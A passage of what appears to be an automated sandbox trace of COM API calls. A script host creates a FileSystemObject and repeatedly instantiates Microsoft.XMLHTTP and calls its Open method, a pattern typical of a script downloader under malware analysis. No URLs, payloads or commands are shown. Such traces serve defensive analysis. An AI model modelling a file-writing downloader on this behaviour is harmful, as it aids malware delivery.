	[0607.741] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0607.741] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0607.741] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0607.741] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0607.741] ??2@YAPEAX_K@Z () returned 0x62f350
	[0607.741] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0607.741] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0607.741] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0607.741] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0607.741] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0607.742] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0607.742] SysStringLen (param_1=0x0) returned 0x0
	[0607.742] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0607.745] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0607.745] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0607.745] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0607.745] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0607.745] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0607.745] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0609.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0609.312] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0609.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0609.314] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0609.314] SysStringLen (param_1=0x0) returned 0x0
	[0609.314] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0609.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0609.314] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0609.314] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0609.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0609.314] ??2@YAPEAX_K@Z () returned 0x62f330
	[0609.314] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0609.314] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0609.314] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0609.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0609.315] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0609.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.315] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0609.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0609.318] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0609.319] SysStringLen (param_1=0x0) returned 0x0
	[0609.319] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0609.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0609.319] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0609.319] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0609.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0609.319] ??2@YAPEAX_K@Z () returned 0x62f310
	[0609.319] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0609.319] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0609.319] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0609.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0609.319] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0609.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.319] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0609.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0609.320] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0609.320] SysStringLen (param_1=0x0) returned 0x0
	[0609.320] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0609.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0609.320] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0609.320] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0609.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0609.320] ??2@YAPEAX_K@Z () returned 0x62f330
	[0609.320] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0609.320] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0609.320] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0609.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0609.320] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0609.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.321] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0609.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0609.321] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0609.321] SysStringLen (param_1=0x0) returned 0x0
	[0609.321] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0609.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0609.321] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0609.321] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0609.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0609.321] ??2@YAPEAX_K@Z () returned 0x62f310
	[0609.321] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0609.321] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0609.321] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0609.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0609.321] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0609.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.322] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0609.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0609.322] longjmp () 
	[0609.322] longjmp () 
	[0609.322] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0609.322] SysStringLen (param_1=0x0) returned 0x0
	[0609.322] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0609.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0609.322] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0609.322] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0609.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0609.322] ??2@YAPEAX_K@Z () returned 0x62f330
	[0609.322] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0609.322] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0609.323] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0609.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0609.323] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0609.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.323] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0609.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0609.323] longjmp () 
	[0609.323] longjmp () 
